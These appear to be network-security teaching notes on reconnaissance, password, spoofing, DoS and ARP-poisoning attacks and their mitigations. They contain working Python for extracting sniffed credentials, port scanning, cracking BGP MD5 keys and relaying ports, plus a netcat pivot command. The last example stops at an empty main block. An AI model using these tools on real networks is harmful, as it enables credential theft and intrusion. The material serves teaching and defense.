Reconnaissance refers to the overall act of learning information about a target network by using readily available information and applications: mapping its hosts, services and weaknesses before an actual attack.
Reconnaissance attacks include these attacks:
Packet sniffers
Port scans
Ping sweeps
Internet information queries
A packet sniffer is a software application that uses a network adapter card in promiscuous mode (accepting every frame on the wire, not only those addressed to its own MAC) to capture all network packets. Packet sniffers have these characteristics:
Packet sniffers exploit information passed in clear text. Protocols that pass information, including credentials, in clear text are Telnet, FTP, SNMP (v1 and v2c community strings), Post Office Protocol (POP), and HTTP.
Packet sniffers must be able to see the traffic they target: on a shared (hub) segment this means the same collision domain as the machine they are targeting; on a switched network the attacker needs a mirror (SPAN) port or must redirect the victim's traffic to its own port, for example with the ARP poisoning described later.
Packet sniffers can be used legitimately or can be designed specifically for attack.
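The slides state that sniffers exploit clear-text protocols but do not show what a sniffer actually recovers. The following added example (not code from the original slides or from any sniffer product) decodes raw Ethernet/IPv4/TCP frames and pulls FTP and POP USER/PASS commands and HTTP Basic credentials out of the payloads. The frames, addresses and credentials are constructed inline so the script runs offline; the helper that builds them leaves checksums at zero, which a real capture would not.

```python
"""Recover credentials from clear-text protocol traffic (added example)."""
import base64
import struct

# Ports of the clear-text protocols named on the slide (SNMP is UDP and not decoded here).
CLEARTEXT_PORTS = {21: "ftp", 23: "telnet", 110: "pop3", 80: "http"}


def parse_frame(frame: bytes):
    """Return (src_ip, dst_ip, sport, dport, payload) for an IPv4/TCP frame, else None."""
    if len(frame) < 14 or frame[12:14] != b"\x08\x00":   # not IPv4 EtherType
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    if ip[9] != 6:                                        # protocol 6 = TCP
        return None
    total_len = struct.unpack("!H", ip[2:4])[0]
    src = ".".join(map(str, ip[12:16]))
    dst = ".".join(map(str, ip[16:20]))
    tcp = ip[ihl:total_len]
    sport, dport = struct.unpack("!HH", tcp[:4])
    doff = (tcp[12] >> 4) * 4                             # TCP header length incl. options
    return src, dst, sport, dport, tcp[doff:]


def extract_credentials(payload: bytes, proto: str):
    """Return a list of (kind, value) credential fragments found in one payload."""
    found = []
    text = payload.decode("latin-1")
    if proto in ("ftp", "pop3"):                          # USER x / PASS y, one command per line
        for line in text.splitlines():
            cmd, _, arg = line.partition(" ")
            if cmd.upper() in ("USER", "PASS"):
                found.append((cmd.upper(), arg.strip()))
    elif proto == "http":                                 # Authorization: Basic base64(user:pass)
        for line in text.splitlines():
            if line.lower().startswith("authorization: basic "):
                token = line.split(None, 2)[2]
                found.append(("BASIC", base64.b64decode(token).decode("latin-1")))
    elif proto == "telnet":                               # keystrokes are echoed; keep raw text
        found.append(("TELNET", text.strip()))
    return found


def sniff(frames):
    """Run the extractor over an iterable of raw frames; return (src, dst, proto, kind, value)."""
    hits = []
    for frame in frames:
        parsed = parse_frame(frame)
        if parsed is None:
            continue
        src, dst, sport, dport, payload = parsed
        proto = CLEARTEXT_PORTS.get(dport)
        if proto and payload:
            for kind, value in extract_credentials(payload, proto):
                hits.append((src, dst, proto, kind, value))
    return hits


def build_frame(src: str, dst: str, sport: int, dport: int, payload: bytes) -> bytes:
    """Constructed test input: minimal Ethernet/IPv4/TCP frame, checksums left at zero."""
    eth = b"\xaa" * 6 + b"\xbb" * 6 + b"\x08\x00"
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    return eth + ip + tcp


# Constructed sample traffic: an FTP login, an HTTP request with Basic auth, and a TLS record
# that carries nothing readable (addresses and credentials are made up for this example).
SAMPLE_FRAMES = [
    build_frame("10.1.1.10", "10.1.1.20", 40001, 21, b"USER alice\r\n"),
    build_frame("10.1.1.10", "10.1.1.20", 40001, 21, b"PASS s3cret\r\n"),
    build_frame("10.1.1.10", "10.1.1.30", 40002, 80,
                b"GET / HTTP/1.1\r\nHost: intranet\r\nAuthorization: Basic Ym9iOmh1bnRlcjI=\r\n\r\n"),
    build_frame("10.1.1.10", "10.1.1.40", 40003, 443, b"\x16\x03\x01\x00\x05hello"),
]

if __name__ == "__main__":
    for hit in sniff(SAMPLE_FRAMES):
        print(hit)
```

Replacing `SAMPLE_FRAMES` with frames read from a raw socket in promiscuous mode turns this into the attack the slide describes; the same loop, run on a monitoring host, is also a cheap way to find clear-text logins that still exist on your own network.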
Packet Sniffer Attack Mitigation
Here are some packet sniffer mitigation techniques and tools:
Cryptography: carry sessions over encrypted protocols or through an IPsec tunnel, so that a captured packet yields nothing readable.
Switched infrastructure with protection against ARP poisoning (Dynamic ARP Inspection, covered later), so that an attacker cannot steer other hosts' traffic to its own port.
Port Scans and Ping Sweeps
Port scan and ping sweep attacks are used to:
Identify all services on the network
Identify all hosts and devices on the network
Identify the operating systems on the network
Identify vulnerabilities on the network
Ping Sweep with NMAP
Blocking Ping Sweeps
An inbound ACL on the router's 10.1.1.254 interface drops ICMP echo requests and permits everything else:
access-list 102 deny icmp any any echo
access-list 102 permit ip any any
ip address 10.1.1.254 255.255.255.0
ip access-group 102 in
Seems like it worked, but… the sweep no longer gets echo replies, yet the router answers each denied probe with an ICMP unreachable (administratively prohibited, type 3 code 13).
We give out too much information: the scanner now knows a filter is in place and which device applies it.
To block messages originating from the blocking router itself, an outbound interface ACL is not enough (it does not apply to packets the router generates), so the unreachables are classified and dropped with a service policy. The policy-map that drops class STOPSHARING is not shown on the slide; the interface command no ip unreachables has the same effect.
access-list 103 permit icmp any any unreachable
class-map match-all STOPSHARING
 match access-group 103
!
service-policy output STOPSHARING
This time the router sends nothing back: the sweep sees neither echo replies nor unreachables.
Simple UDP Port Scan
A UDP scanner sends a datagram to each port. A closed port answers with ICMP Destination Unreachable (port unreachable, type 3 code 3); an open or filtered port usually answers nothing.
How to block: filter the unreachables as they leave the router toward the scanner (here they are generated by the scanned host, so an outbound ACL does apply):
access-list 101 deny icmp any any unreachable
access-list 101 permit ip any any
ip address 10.1.1.254 255.255.255.0
ip access-group 101 out
The router forwards no unreachable messages, so the scanner never gets a negative answer for any port.
After blocking, every port appears open|filtered. This buys some obscurity against the scanner but does not stop the scan.
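The scanning slides only show the router side. The following added example (not from the original slides or from nmap) is a minimal scanner that classifies ports the way nmap does: a TCP connect scan, and a UDP scan that treats an ICMP port unreachable (surfaced as ECONNREFUSED on a connected UDP socket) as "closed" and silence as "open|filtered". It scans the local host, binding its own TCP and UDP listeners so that it runs offline; the "closed" targets are ephemeral ports released just before the scan. Once a router drops unreachables, as configured above, the UDP branch can only ever return "open|filtered", which is the obscurity the slide refers to.

```python
"""TCP connect scan and UDP scan with ICMP-unreachable interpretation (added example)."""
import socket


def tcp_connect_scan(host: str, ports, timeout: float = 0.5) -> dict:
    """Full connect scan: handshake completes => open, RST => closed, no answer => filtered."""
    results = {}
    for port in ports:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            results[port] = "open"
        except ConnectionRefusedError:
            results[port] = "closed"
        except (socket.timeout, OSError):
            results[port] = "filtered"
        finally:
            s.close()
    return results


def udp_scan(host: str, ports, timeout: float = 0.5) -> dict:
    """UDP scan: ICMP port unreachable proves the port closed; silence is open|filtered."""
    results = {}
    for port in ports:
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        s.settimeout(timeout)
        try:
            s.connect((host, port))          # connected UDP socket receives the ICMP error
            s.send(b"\x00")
            s.recv(1)                        # an application-layer reply would mean open
            results[port] = "open"
        except ConnectionRefusedError:       # kernel relays ICMP type 3 code 3 as ECONNREFUSED
            results[port] = "closed"
        except socket.timeout:               # no reply at all: open, or unreachables filtered
            results[port] = "open|filtered"
        finally:
            s.close()
    return results


def listeners():
    """Bind a TCP listener and a UDP socket on ephemeral ports: the 'open' targets."""
    t = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    t.bind(("127.0.0.1", 0))
    t.listen(5)
    u = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    u.bind(("127.0.0.1", 0))
    return t, u


def free_port(kind) -> int:
    """Pick a port that is currently closed: bind to 0, read the number, release it."""
    s = socket.socket(socket.AF_INET, kind)
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port


def demo():
    """Scan one open and one closed port of each kind on the local host."""
    t, u = listeners()
    try:
        tcp_open, udp_open = t.getsockname()[1], u.getsockname()[1]
        tcp_res = tcp_connect_scan("127.0.0.1", [tcp_open, free_port(socket.SOCK_STREAM)])
        udp_res = udp_scan("127.0.0.1", [udp_open, free_port(socket.SOCK_DGRAM)])
        return tcp_res, udp_res
    finally:
        t.close()
        u.close()


if __name__ == "__main__":
    print(demo())
```

Point the two scan functions at a host behind the router configured with access-list 101 and the UDP results collapse to "open|filtered" for every port, while the TCP connect scan still distinguishes open from closed, because TCP RSTs are not ICMP and are not covered by that ACL.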
Port scans and ping sweeps cannot be prevented without compromising network capabilities.
Port Scan and Ping Sweep Attack Mitigation
However, damage can be mitigated using IPS at the network and host levels.
[Figure: network IDS and IPS on the shared connection, with HIPS on the workstation and the laptop]
Internet Information Queries
Sample IP address query
Attackers can use Internet tools such as whois as a weapon: registration records reveal the target's address ranges, name servers and administrative contacts.
Intruders use access attacks on networks or systems for these reasons:
Escalate their access privileges
Access attacks include:
Password attacks
Trust exploitation
Port redirection
Man-in-the-middle attacks
Hackers implement password attacks using:
Brute-force and dictionary cracking of captured authentication data
Trojan horse programs
Packet sniffers
Password Attack Example
The bgp_md5crack tool cracks the secret used for RFC 2385 TCP MD5 packet signing and authentication (the option that protects BGP sessions). It is designed for offline cracking, meaning it works on a sniffed, correctly signed packet, which can either be taken directly off the wire or provided in a pcap file.
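What such a tool has to compute is fixed by RFC 2385: the 16-byte option value is MD5 over the TCP pseudo-header, the 20-byte TCP header with the checksum zeroed and options excluded, the segment data, and finally the key. The following added example (written for this page, not bgp_md5crack's code) builds one BGP OPEN segment signed with a known password and then recovers that password from the signed bytes alone, exactly the offline dictionary attack a sniffed packet permits. The addresses, AS number, wordlist and password are constructed for the example.

```python
"""RFC 2385 TCP MD5 signature: sign a segment, then crack the key offline (added example)."""
import hashlib
import ipaddress
import struct

TCPOPT_MD5 = 19   # TCP option kind for the RFC 2385 signature, length 18


def tcp_md5_digest(src: str, dst: str, tcp_hdr: bytes, data: bytes, key: bytes) -> bytes:
    """RFC 2385 section 2.0: MD5(pseudo-header | option-less TCP header, checksum 0 | data | key)."""
    seg_len = len(tcp_hdr) + len(data)            # full segment length, options included
    pseudo = (ipaddress.ip_address(src).packed + ipaddress.ip_address(dst).packed
              + struct.pack("!BBH", 0, 6, seg_len))
    base_hdr = tcp_hdr[:16] + b"\x00\x00" + tcp_hdr[18:20]   # first 20 bytes, checksum zeroed
    return hashlib.md5(pseudo + base_hdr + data + key).digest()


def build_signed_segment(src, dst, sport, dport, data, key):
    """Constructed IPv4/TCP segment carrying the MD5 option and a BGP payload."""
    opts = bytes([TCPOPT_MD5, 18]) + b"\x00" * 16 + b"\x01\x01"   # digest placeholder + 2 NOPs
    doff = (20 + len(opts)) // 4
    hdr = struct.pack("!HHIIBBHHH", sport, dport, 0x1000, 0x2000, doff << 4, 0x18, 16384, 0, 0)
    digest = tcp_md5_digest(src, dst, hdr + opts, data, key)
    opts = opts[:2] + digest + opts[18:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(hdr) + len(opts) + len(data), 0, 0,
                     64, 6, 0, ipaddress.ip_address(src).packed, ipaddress.ip_address(dst).packed)
    return ip + hdr + opts + data


def parse_segment(pkt: bytes):
    """Split a raw IPv4/TCP packet into the pieces the digest covers plus the signed digest."""
    ihl = (pkt[0] & 0x0F) * 4
    src = str(ipaddress.ip_address(pkt[12:16]))
    dst = str(ipaddress.ip_address(pkt[16:20]))
    tcp = pkt[ihl:struct.unpack("!H", pkt[2:4])[0]]
    doff = (tcp[12] >> 4) * 4
    hdr, data = tcp[:doff], tcp[doff:]
    i, digest = 20, None
    while i < doff:                               # walk the options looking for kind 19
        kind = hdr[i]
        if kind == 0:                             # end of option list
            break
        if kind == 1:                             # NOP
            i += 1
            continue
        length = hdr[i + 1]
        if kind == TCPOPT_MD5:
            digest = hdr[i + 2:i + 2 + 16]
        i += length
    return src, dst, hdr, data, digest


def crack(pkt: bytes, wordlist):
    """Return the password that reproduces the packet's signature, or None."""
    src, dst, hdr, data, digest = parse_segment(pkt)
    if digest is None:
        return None
    for word in wordlist:
        if tcp_md5_digest(src, dst, hdr, data, word.encode()) == digest:
            return word
    return None


# Constructed sample: a BGP OPEN (version 4, AS 65000, hold time 180, BGP id 10.1.1.1) from
# 10.1.1.1:179 to 10.1.1.2, signed with the made-up password "cisco123".
BGP_OPEN = b"\xff" * 16 + bytes([0x00, 0x1d, 0x01, 0x04, 0xfd, 0xe8, 0x00, 0xb4,
                                 0x0a, 0x01, 0x01, 0x01, 0x00])
SAMPLE_PACKET = build_signed_segment("10.1.1.1", "10.1.1.2", 179, 40000, BGP_OPEN, b"cisco123")
WORDLIST = ["password", "cisco", "bgp", "cisco123", "admin"]

if __name__ == "__main__":
    print(crack(SAMPLE_PACKET, WORDLIST))
```

Because the key is the last thing hashed and nothing in the scheme is salted or iterated, one MD5 per guess is all the attacker pays; keyed MD5 here provides authentication of the session, not protection of a weak password. Feed the same `crack` function the bytes of a real captured segment (for example from a pcap) and it behaves as the tool described above.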
For Routing Protocols…
Simple cracking with Cain & Abel, whose sniffer captures authentication hashes and feeds them to its dictionary and brute-force cracker…
A hacker leverages existing trust relationships.
Several trust models exist:
Linux and UNIX:
System A trusts System B.
System B trusts everyone.
System A trusts everyone.
[Figure: trust exploitation example] System A trusts System B; both have the account psmith (Pat Smith). A hacker compromises System B and creates a user psmith (Pat Smithson) there. Because System A trusts System B, the hacker gains access to System A as psmith.
Port Redirection
[Figure: the attacker cannot reach Host B on port 23 directly (source: attacker, destination: B, port 23). Instead the attacker connects to compromised Host A on port 22 (source: attacker, destination: A, port 22), and Host A opens the connection to Host B (source: A, destination: B, port 23), which the firewall permits.]
Port Redirection Configuration
On HOSTA we create a named pipe using the mkfifo command (pipe is the name of the FIFO):
mkfifo pipe
We then create our two-way tunnel using Netcat on HOSTA. The listener's output is piped to the connection toward the internal target, and the target's replies come back through the FIFO into the listener's input:
nc -lvp 25 <pipe | nc -t 10.1.2.253 23 >pipe
Then, from the attacker machine, telnet to HOSTA on the port the listener uses (it must match the -lvp port above):
telnet 10.1.2.1 25
The attacker now has a Telnet session with the internal switch at 10.1.2.253, relayed through HOSTA, and the switch sees HOSTA as the source.
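The mkfifo/netcat pair above relays bytes in both directions between two TCP connections. The following added example (not from the original slides) does the same in Python so that the mechanism can be run and tested offline: a relay accepts on one port, opens its own connection to the internal target, and pumps data both ways; a local echo server stands in for the switch's Telnet daemon, and all ports are ephemeral ones chosen at run time.

```python
"""Two-way TCP port redirection, the netcat/FIFO relay in Python (added example)."""
import socket
import threading


def _pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes from src to dst until src reaches EOF, then half-close dst."""
    try:
        while True:
            chunk = src.recv(4096)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)   # propagate EOF so the far side finishes cleanly
        except OSError:
            pass


def start_relay(listen_port: int, target: tuple) -> socket.socket:
    """Listen on listen_port; for each client, connect to target and pump both directions.
    The target sees the relay host, not the client, as the source (the point of the attack)."""
    ls = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ls.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    ls.bind(("127.0.0.1", listen_port))
    ls.listen(5)

    def accept_loop():
        while True:
            try:
                client, _ = ls.accept()
            except OSError:                # listener closed
                return
            upstream = socket.create_connection(target)
            threading.Thread(target=_pump, args=(client, upstream), daemon=True).start()
            threading.Thread(target=_pump, args=(upstream, client), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return ls


def start_echo_server() -> socket.socket:
    """Constructed stand-in for the internal Telnet service: echoes whatever it receives."""
    ss = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ss.bind(("127.0.0.1", 0))
    ss.listen(5)

    def serve():
        while True:
            try:
                conn, _ = ss.accept()
            except OSError:
                return
            threading.Thread(target=_pump, args=(conn, conn), daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return ss


def through_relay(message: bytes) -> bytes:
    """Attacker side: connect to the relay, send message, return what comes back."""
    echo = start_echo_server()
    relay = start_relay(0, echo.getsockname())      # port 0: let the OS pick a free port
    try:
        with socket.create_connection(relay.getsockname()) as c:
            c.sendall(message)
            c.shutdown(socket.SHUT_WR)
            reply = b""
            while True:
                chunk = c.recv(4096)
                if not chunk:
                    break
                reply += chunk
        return reply
    finally:
        relay.close()
        echo.close()


if __name__ == "__main__":
    print(through_relay(b"show version\r\n"))
```

On the compromised host the detection opportunity is the same as with netcat: an inbound connection on an unusual port followed immediately by an outbound connection from the same process to a port (here 23) the host normally never talks to.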
IP spoofing occurs when a hacker inside or outside a network impersonates a trusted source.
IP spoofing uses trusted internal IP addresses or trusted external IP addresses.
Attackers use IP spoofing for many reasons:
To gain root access
To inject malicious data or commands into an existing data stream
To divert network packets to the hacker, who can then reply as a trusted user, by changing the routing tables
To crash servers by overloading memory (DoS)
As a step in a larger attack
IP Spoofing—Types of Attack
IP spoofing attacks are either:
Nonblind: the attacker sniffs sequence numbers (i.e., from inside the subnet of the victim).
Blind: the attacker calculates sequence numbers without seeing the victim's replies.
IP spoofing can lead to these types of attacks:
DoS and distributed DoS (DDoS) attacks
Man-in-the-middle attacks
Let's see it in action.
Here we drive the router to reply to the other host: the demo sends an echo request whose source address is spoofed to that host, so the router's reply goes to it instead of to the sender.
A man-in-the-middle attack requires that the hacker has access to network packets that come across a network.
A man-in-the-middle attack is implemented using the following:
Network packet sniffers (nonblind attack)
Routing and transport protocols (blind attack)
[Figure: Host A and Host B exchanging data in clear text through Router A and Router B, with the attacker in the path]
IP Spoofing Attack Mitigation
The threat of IP spoofing can be reduced, but not eliminated, using these measures:
Strong access control at the router
ACLs on outbound interface
ACLs on inbound interface
Additional authentication requirements, such as IPsec, which authenticates the peer cryptographically instead of trusting its source address
[Figure: Host A and Host B communicating through an IPsec tunnel between Router A and Router B across the ISP]
A DoS attack damages or corrupts your computer system or denies you and others access to your networks, systems, or services.
DoS attack techniques very often use IP spoofing, both to hide the source and to defeat per-source filtering.
TCP SYN Flooding DoS Attack
[Figure: TCP three-way handshake versus a SYN flood]
In a normal TCP three-way handshake the TCP client (client ports 1024 to 65535) sends 1 SYN, the TCP server (service ports 1 to 1024, here port 80) answers 2 SYN and ACK, and the client completes the connection with 3 ACK.
In a SYN flood the attacker sends a stream of SYN packets with spoofed source addresses to the victim server's port 80. The server allocates a half-open connection for each one and sends its SYN and ACK to the spoofed address, which never answers, so step 3 never arrives; the backlog of half-open connections fills and legitimate clients can no longer connect.
DoS and DDoS attacks have these characteristics:
They are not generally targeted to gain access.
They aim at making a service unavailable.
They require very little effort to execute.
They are difficult to eliminate.
[Figure: attacker, attack control mechanism, zombies, victim]
DDoS Example
[Figure: client system, handler systems, agents]
The client (the attacker's system) issues commands to handlers, which control the agents that carry out the mass attack.
The cracker looks for targets.
The cracker compromises hosts and installs the software that scans for, compromises and infects further agents with zombie code.
Agents are loaded with remote-control attack software.
SYN Flooding Attack
Let's be more creative: the demo floods the victim with SYNs from spoofed sources.
We put almost 1 million packets on the wire in a one-minute period, not bad for a single sender…
DoS and DDoS Attack Mitigation
Reduce DoS and DDoS attacks by:
Protecting yourself against IP spoofing with ingress- and egress-filtering ACLs
Using antivirus software to find zombie agents
Using anti-DoS features on routers and firewalls
The ip verify unicast reverse-path interface command (unicast RPF), which drops packets whose source address is not reachable back through the interface they arrived on
ACLs to filter all private Internet address space (RFC 1918)
Using traffic rate limiting at the ISP level
Use class-based traffic policing on ICMP packets
Use SYN rate limiting
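The ingress- and egress-filtering ACLs in the IP spoofing mitigation section and the uRPF and RFC 1918 items here are the same decision made by a router on each arriving packet. The following added example (not from the original slides or from IOS) models that decision: a longest-prefix routing table, unicast RPF in strict and loose mode, and a bogon check that drops private sources arriving from the Internet. The routing table, interface names and packets are constructed for the example.

```python
"""Ingress filtering: unicast RPF (strict/loose) plus RFC 1918 bogon check (added example)."""
import ipaddress

RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


class Router:
    def __init__(self, routes):
        # routes: (prefix, egress interface); sorted so that the longest prefix matches first
        self.routes = sorted(((ipaddress.ip_network(p), i) for p, i in routes),
                             key=lambda r: r[0].prefixlen, reverse=True)

    def lookup(self, addr):
        """Longest-prefix match; returns the egress interface or None."""
        ip = ipaddress.ip_address(addr)
        for net, iface in self.routes:
            if ip in net:
                return iface
        return None

    def urpf(self, src, in_iface, mode="strict"):
        """'ip verify unicast reverse-path': the source must be routable (loose) and, in
        strict mode, routable via the very interface the packet arrived on."""
        via = self.lookup(src)
        if via is None:
            return False
        return via == in_iface if mode == "strict" else True

    def ingress_filter(self, src, in_iface, untrusted=("internet",), mode="strict"):
        """Decision for one packet: bogon check on untrusted interfaces, then uRPF."""
        ip = ipaddress.ip_address(src)
        if in_iface in untrusted and any(ip in n for n in RFC1918):
            return "drop:rfc1918"
        if not self.urpf(src, in_iface, mode):
            return f"drop:urpf-{mode}"
        return "permit"


# Constructed edge router: two inside LANs, a DMZ, and a default route toward the ISP.
EDGE = Router([("10.1.1.0/24", "lan"), ("10.1.2.0/24", "lan"),
               ("203.0.113.0/24", "dmz"), ("0.0.0.0/0", "internet")])

# Constructed packets as (source address, arrival interface).
PACKETS = [
    ("10.1.1.7", "lan"),           # legitimate inside host
    ("10.1.1.7", "internet"),      # outsider spoofing an inside address
    ("192.168.5.5", "internet"),   # private source from the Internet
    ("198.51.100.9", "internet"),  # ordinary Internet source
    ("203.0.113.4", "internet"),   # DMZ address arriving from the Internet (spoofed)
    ("203.0.113.4", "lan"),        # DMZ address arriving on the LAN port (spoofed)
]


def filter_all(router=EDGE, packets=PACKETS, mode="strict"):
    """Return the verdict for every packet, keyed by (source, interface)."""
    return {(s, i): router.ingress_filter(s, i, mode=mode) for s, i in packets}


if __name__ == "__main__":
    for key, verdict in filter_all().items():
        print(key, verdict)
```

Strict mode is what the slide's interface command enables by default and is the right choice at the customer edge; where routing is asymmetric (multi-homed sites, packets that legitimately return through a different interface) strict uRPF drops good traffic, and loose mode, which only catches unroutable sources, is the safe fallback.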
What rate limiting does:
Allows network managers to set bandwidth thresholds for users and by traffic type
Prevents the deliberate or accidental flooding of the network
Keeps traffic flowing smoothly
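Class-based policing of ICMP and SYN rate limiting, listed above, are both token-bucket policers: each class earns tokens at its committed rate up to a burst size, and a packet that finds no token is dropped (or marked). The following added example (not from the original slides or from IOS) implements such a policer in exact integer arithmetic and runs it over a constructed trace in which 1000 SYNs arrive within one second alongside a slow trickle of ICMP echoes; the rates and burst sizes are made up for the example.

```python
"""Token-bucket policing per traffic class, as used for SYN and ICMP rate limiting (added example)."""


class TokenBucket:
    """Single-rate policer. Times are integer milliseconds and tokens are kept in thousandths,
    so a rate of rate_pps packets per second adds exactly rate_pps thousandths per millisecond."""

    def __init__(self, rate_pps: int, burst_packets: int):
        self.rate = rate_pps
        self.cap = burst_packets * 1000
        self.tokens = self.cap            # bucket starts full: the allowed burst
        self.last_ms = 0

    def conform(self, now_ms: int) -> bool:
        """Refill for the time elapsed since the last packet, then try to spend one packet."""
        self.tokens = min(self.cap, self.tokens + (now_ms - self.last_ms) * self.rate)
        self.last_ms = now_ms
        if self.tokens >= 1000:
            self.tokens -= 1000
            return True
        return False


def police(trace, classes):
    """Apply one policer per class to (time_ms, class) records; return conform/exceed counts."""
    buckets = {c: TokenBucket(rate, burst) for c, (rate, burst) in classes.items()}
    stats = {c: {"conform": 0, "exceed": 0} for c in classes}
    for t, cls in trace:
        if cls not in buckets:            # unclassified traffic is not policed here
            continue
        stats[cls]["conform" if buckets[cls].conform(t) else "exceed"] += 1
    return stats


def synthetic_trace():
    """Constructed: 1000 SYNs, one per millisecond (a flood), plus 20 ICMP echoes 100 ms apart."""
    syns = [(ms, "tcp-syn") for ms in range(1000)]
    icmp = [(i * 100, "icmp") for i in range(20)]
    return sorted(syns + icmp)


# Policy: SYNs at 100 per second with a burst of 50; ICMP at 10 per second with a burst of 5.
POLICY = {"tcp-syn": (100, 50), "icmp": (10, 5)}

if __name__ == "__main__":
    print(police(synthetic_trace(), POLICY))
```

The burst parameter is what keeps legitimate traffic flowing: the ICMP trickle never touches its limit, while the SYN flood is cut to its committed rate after the first burst. The same arithmetic, with bytes instead of packets, is a bandwidth policer for the user classes in the next figure.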
Rate Limiting for Different Classes of Users
[Figure: the network manager assigns different bandwidth thresholds (2 Mbps, 10 Mbps, 50 Mbps) to classes of users such as teachers and students.] Otherwise, there can be a deliberate or accidental slowdown or freezing of the network.
[Figure: hosts A, B and C on one LAN segment; the attacker is host C (IP 10.1.1.3, MAC C.C.C.C)]
1. Host 10.1.1.2 broadcasts an ARP request for the MAC of 10.1.1.1.
2. The legitimate ARP reply arrives: 10.1.1.1 = MAC B.B.B.B.
3. The attacker then sends gratuitous ARP replies that overwrite the legitimate bindings in both victims' ARP tables:
10.1.1.1 bound to C.C.C.C (in the ARP table of 10.1.1.2)
10.1.1.2 bound to C.C.C.C (in the ARP table of 10.1.1.1)
Both hosts now send each other's traffic to the attacker, who forwards it on and reads it in the clear.
Mitigating Man-in-the-Middle Attacks with DAI
MAC/IP Tracking Built on DHCP Snooping
[Figure: clients 10.1.1.1 and 10.1.1.2 on a switch, DHCP server upstream]
DAI provides protection against attacks such as ARP poisoning using spoofing tools such as ettercap, dsniff, and arpspoof.
DAI function: the switch tracks the DHCP Discover (broadcast) and the DHCP Offer (unicast) to record the MAC/IP binding of each client, then tracks subsequent ARPs for that MAC or IP and drops any that contradict the binding.
DAI in Action
A binding table containing IP-address and MAC-address associations is dynamically populated using DHCP snooping.
[Figure: gateway 10.1.1.1, client 10.1.1.2, attacker on another access port]
The attacker sends a gratuitous ARP ("I am your gateway: 10.1.1.1") to change the IP-to-MAC bindings in the victims' ARP caches. The switch checks the sender against its binding table: the gateway is 10.1.1.1, and the attacker's port is not bound to that address, so the GARP is dropped.
ip arp inspection vlan 20
ip arp inspection vlan 20 logging dhcp-bindings all
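The following added example (written for this page, not switch firmware) models what the two commands above turn on: a DHCP snooping binding table learned only from DHCP acknowledgements seen on trusted ports, and an ARP inspection step that forwards an ARP from an untrusted port only if its sender IP and MAC match the binding for that port. It replays the poisoning scenario from the figures: the attacker's own ARP passes, its gratuitous ARPs claiming the gateway and the other host are dropped and logged, and a rogue DHCP ACK from an access port is ignored. Port names, MAC addresses and the simplification of learning from the ACK alone are assumptions of the example.

```python
"""Dynamic ARP Inspection on top of a DHCP snooping binding table (added example)."""
from dataclasses import dataclass, field


@dataclass
class Switch:
    trusted_ports: set = field(default_factory=set)        # uplinks to DHCP server / gateway
    bindings: dict = field(default_factory=dict)           # (vlan, ip) -> (mac, port)
    log: list = field(default_factory=list)

    def snoop_dhcp(self, vlan, port, msg) -> bool:
        """Learn a binding from a DHCP ACK; ACKs are only believed from trusted ports."""
        if msg["op"] != "ACK":
            return True                                    # discover/request: nothing to learn
        if port not in self.trusted_ports:
            self.log.append(f"DHCP ACK on untrusted port {port} dropped")
            return False
        self.bindings[(vlan, msg["yiaddr"])] = (msg["chaddr"], msg["client_port"])
        return True

    def inspect_arp(self, vlan, port, arp) -> str:
        """DAI: on untrusted ports the sender IP/MAC must match the binding for that port."""
        if port in self.trusted_ports:
            return "forward"
        bound = self.bindings.get((vlan, arp["sender_ip"]))
        if bound is None or bound != (arp["sender_mac"], port):
            self.log.append(f"DAI drop: vlan {vlan} port {port} "
                            f"{arp['sender_ip']} claimed by {arp['sender_mac']}")
            return "drop"
        return "forward"


def scenario():
    """Replay the poisoning attempt: returns the verdict per packet and the switch log."""
    sw = Switch(trusted_ports={"Gi0/1"})                   # uplink toward DHCP server and gateway
    vlan = 20
    # Two clients obtain leases through the trusted uplink (constructed DHCP ACKs).
    sw.snoop_dhcp(vlan, "Gi0/1", {"op": "ACK", "yiaddr": "10.1.1.2",
                                  "chaddr": "aa:aa:aa:aa:aa:aa", "client_port": "Fa0/2"})
    sw.snoop_dhcp(vlan, "Gi0/1", {"op": "ACK", "yiaddr": "10.1.1.3",
                                  "chaddr": "cc:cc:cc:cc:cc:cc", "client_port": "Fa0/3"})
    attacker = "cc:cc:cc:cc:cc:cc"                          # host on Fa0/3
    verdicts = {
        "gateway reply": sw.inspect_arp(vlan, "Gi0/1",
                                        {"sender_ip": "10.1.1.1", "sender_mac": "bb:bb:bb:bb:bb:bb"}),
        "host reply": sw.inspect_arp(vlan, "Fa0/2",
                                     {"sender_ip": "10.1.1.2", "sender_mac": "aa:aa:aa:aa:aa:aa"}),
        "attacker own arp": sw.inspect_arp(vlan, "Fa0/3",
                                           {"sender_ip": "10.1.1.3", "sender_mac": attacker}),
        "attacker garp as gateway": sw.inspect_arp(vlan, "Fa0/3",
                                                   {"sender_ip": "10.1.1.1", "sender_mac": attacker}),
        "attacker garp as host": sw.inspect_arp(vlan, "Fa0/3",
                                                {"sender_ip": "10.1.1.2", "sender_mac": attacker}),
        "rogue dhcp ack": sw.snoop_dhcp(vlan, "Fa0/3", {"op": "ACK", "yiaddr": "10.1.1.9",
                                                         "chaddr": "dd:dd:dd:dd:dd:dd",
                                                         "client_port": "Fa0/4"}),
    }
    return verdicts, sw.log


if __name__ == "__main__":
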